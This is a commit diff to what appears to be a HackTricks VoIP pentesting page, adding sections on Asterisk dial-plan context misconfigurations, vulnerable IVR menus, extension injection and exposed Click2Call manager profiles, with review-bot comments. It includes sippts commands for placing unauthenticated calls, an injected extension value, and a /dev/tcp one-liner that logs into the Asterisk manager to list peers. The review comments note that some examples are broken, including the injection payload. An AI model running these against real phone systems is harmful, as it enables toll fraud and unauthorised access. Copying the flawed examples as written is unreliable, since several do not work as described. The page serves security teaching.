GITBOOK-3877: change request with no subject merged in GitBook

This commit is contained in:
CPol 2023-04-18 04:09:32 +00:00 committed by gitbook-bot
parent 679bd88424
commit 551efedf6a
No known key found for this signature in database
GPG Key ID: 07D2180C7B12D0FF
1 changed files with 138 additions and 3 deletions


@ -20,8 +20,6 @@ To start learning about how VoIP works check:
[basic-voip-protocols](basic-voip-protocols/)
{% endcontent-ref %}
## VoIP Red Team Methodology
## VoIP Enumeration
### Telephone Numbers
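Review bot: in this hunk "## VoIP Red Team Methodology" is immediately followed by "## VoIP Enumeration" with no body text between the two H2 headings; if the first heading is the one that survives this change it is an empty section, so either give it an intro paragraph or drop it and keep only "## VoIP Enumeration".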
@ -225,7 +223,7 @@ It's possible to send these codes in **INFO SIP messages**, in **audio** or insi
multimon -a DTMF -t wac pin.wav
```
### Asterisks Misconfigurations
### Asterisks Connections Misconfigurations
In Asterisk it's possible to allow a connection **from an specific IP address** or from **any IP address**:
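Review bot: the renamed heading "### Asterisks Connections Misconfigurations" keeps the plural "Asterisks" although the software is called Asterisk (as the context line below it correctly says); suggest "### Asterisk Connection Misconfigurations". In the same context line, "from an specific IP address" should read "from a specific IP address".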
@ -257,6 +255,143 @@ For example, this configuration would be vulnerable:\
`type=friend`
{% endhint %}
### Asterisks Context Misconfigurations
In Asterisk a **context** is a named container or section in the dial plan that **groups together related extensions, actions, and rules**. The dial plan is the core component of an Asterisk system, as it defines **how incoming and outgoing calls are handled and routed**. Contexts are used to organize the dial plan, manage access control, and provide separation between different parts of the system.
Each context is defined in the configuration file, typically in the **`extensions.conf`** file. Contexts are denoted by square brackets, with the context name enclosed within them. For example:
```bash
csharpCopy code[my_context]
```
Inside the context, you define extensions (patterns of dialed numbers) and associate them with a series of actions or applications. These actions determine how the call is processed. For instance:
```scss
[my_context]
exten => 100,1,Answer()
exten => 100,n,Playback(welcome)
exten => 100,n,Hangup()
```
This example demonstrates a simple context called "my\_context" with an extension "100". When someone dials 100, the call will be answered, a welcome message will be played, and then the call will be terminated.
This is **another context** that allows to **call to any other number**:
```scss
[external]
exten => _X.,1,Dial(SIP/trunk/${EXTEN})
```
If the admin defines the **default context** as:
```
[default]
include => my_context
include => external
```
{% hint style="warning" %}
Anyone will be able to use the **server to call to any other number** (and the admin of the server will pay for the call).
{% endhint %}
{% hint style="danger" %}
Moreover, by default the **`sip.conf`** file contains **`allowguest=true`**, then **any** attacker with **no authentication** will be able to call to any other number.
{% endhint %}
* **`sipinvite.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** Sipinvite checks if a **PBX server allows us to make calls without authentication**. If the SIP server has an incorrect configuration, it will allow us to make calls to external numbers. It can also allow us to transfer the call to a second external number.
For example, if your Asterisk server has a bad context configuration, you can accept INVITE request without authorization. In this case, an attacker can make calls without knowing any user/pass.
{% code overflow="wrap" %}
```bash
# Trying to make a call to the number 555555555 (without auth) with source number 200.
python3 sipinvite.py -i 192.168.0.1 -fu 200 -tu 555555555 -v
# Trying to make a call to the number 555555555 (without auth) and transfer it to number 444444444.
python3 sipinvite.py -i 192.168.0.1 -tu 555555555 -t 444444444
```
{% endcode %}
### Misconfigured IVRS
IVRS stands for **Interactive Voice Response System**, a telephony technology that allows users to interact with a computerized system through voice or touch-tone inputs. IVRS is used to build **automated call handling** systems that offer a range of functionalities, such as providing information, routing calls, and capturing user input.
IVRS in VoIP systems typically consists of:
1. **Voice prompts**: Pre-recorded audio messages that guide users through the IVR menu options and instructions.
2. **DTMF** (Dual-Tone Multi-Frequency) signaling: Touch-tone inputs generated by pressing keys on the phone, which are used to navigate through the IVR menus and provide input.
3. **Call routing**: Directing calls to the appropriate destination, such as specific departments, agents, or extensions based on user input.
4. **User input capture**: Collecting information from callers, such as account numbers, case IDs, or any other relevant data.
5. **Integration with external systems**: Connecting the IVR system to databases or other software systems to access or update information, perform actions, or trigger events.
In an Asterisk VoIP system, you can create an IVR using the dial plan (**`extensions.conf`** file) and various applications such as `Background()`, `Playback()`, `Read()`, and more. These applications help you play voice prompts, capture user input, and control the call flow.
#### Example of vulnerable configuration
```scss
exten => 0,100,Read(numbers,the_call,,,,5)
exten => 0,101,GotoIf("$[${numbers}"="1"]?200)
exten => 0,102,GotoIf("$[${numbers}"="2"]?300)
exten => 0,103,GotoIf("$[${numbers}"=""]?100)
exten => 0,104,Dial(LOCAL/${numbers})
```
The previous is a example where the user is asked to **press 1 to call** a department, **2 to call** another, or **the complete extension** if he knows it.\
The vulnerability is the fact that the indicated **extension length is not checked, so a user could input the 5seconds timeout a complete number and it will be called.**
### Extension Injection
Using a extension such as:
```scss
exten => _X.,1,Dial(SIP/${EXTEN})
```
Where **`${EXTEN}`** is the **extension** that will be called, when the **ext 101 is introduced** this is what would happen:
```scss
exten => 101,1,Dial(SIP/101)
```
However, if **`${EXTEN}`** allows to introduce **more than numbers** (like in older Asterisk versions), an attacker could introduce **`101&SIP123123123`** to call the phone number 123123123. And this would be the result:
```scss
exten => 101&SIP123123123,1,Dial(SIP/101&SIP123123123)
```
Therefore, a call to the extension **`101`** and **`123123123`** will be send and only the first one getting the call would be stablished... but if an attacker use an **extension that bypasses any match** that is being performed but doesn't exist, he could be **inject a call only to the desired number**.
### Click2Call
Click2Call allows a **web user** (who for example might be interested in a product) to **introduce** his **telephone number** to get called. Then a commercial will be called, and when he **picks up the phone** the user will be **called and connected with the agent**.
A common Asterisk profile for this is:
```scss
[web_user]
secret = complex_password
deny = 0.0.0.0/0.0.0.0
allow = 0.0.0.0/0.0.0.0
displayconnects = yes
read = system,call,log,verbose,agent,user,config,dtmf,reporting,crd,diapla
write = system,call,agent,user,config,command,reporting,originate
```
* The previos profile is allowing **ANY IP address to connect** (if the password is known).
* To **organize a call**, like specified previously, **no read permissions is necessary** and **only** **originate** in **write** is needed.
With those permissions any IP knowing the password could connect and extract too much info, like:
{% code overflow="wrap" %}
```bash
# Get all the peers
exec 3<>/dev/tcp/10.10.10.10/5038 && echo -e "Action: Login\nUsername:test\nSecret:password\nEvents: off\n\nAction:Command\nCommand: sip show peers\n\nAction: logoff\n\n">&3 && cat <&3
```
{% endcode %}
**More information or actions could be requested.**
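Review bot: the Extension Injection example in this hunk does not do what the text says, because the injected string `101&SIP123123123` is missing the `/` between the channel technology and the number; `Dial(SIP/101&SIP123123123)` has no valid second channel, so the payload and its result line should read `101&SIP/123123123` and `exten => 101&SIP/123123123,1,Dial(SIP/101&SIP/123123123)`. In the IVR example the `GotoIf` quoting is malformed (`GotoIf("$[${numbers}"="1"]?200)` puts the quotes around the `$[` expression instead of inside it); the working form is `GotoIf($["${numbers}"="1"]?200)`, and the intended vulnerability is clearer if the text names the empty third argument of `Read(numbers,the_call,,,,5)` (maxdigits) as the missing length limit, with `Read(numbers,the_call,1,,,5)` as the fix. The first context example carries pasted editor residue: `csharpCopy code[my_context]` should be just `[my_context]`, and the dialplan fences are tagged `scss` while the `[default]` fence has no tag; use one consistent tag. In the Click2Call profile the `read` line ends in `crd,diapla`, which are typos for the AMI permission classes `cdr,dialplan`, and since the bullets below say only `write = originate` is needed, the example fix should show `read =` empty and `allow` restricted to the web server's address instead of `0.0.0.0/0.0.0.0`. Minor wording: `sip.conf` ships `allowguest=yes` rather than `allowguest=true`, "input the 5seconds timeout" should be "input, within the 5-second timeout,", "will be send ... stablished" should be "will be sent ... established", and "previos" should be "previous".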
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a><a href="https://twitter.com/carlospolopm"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>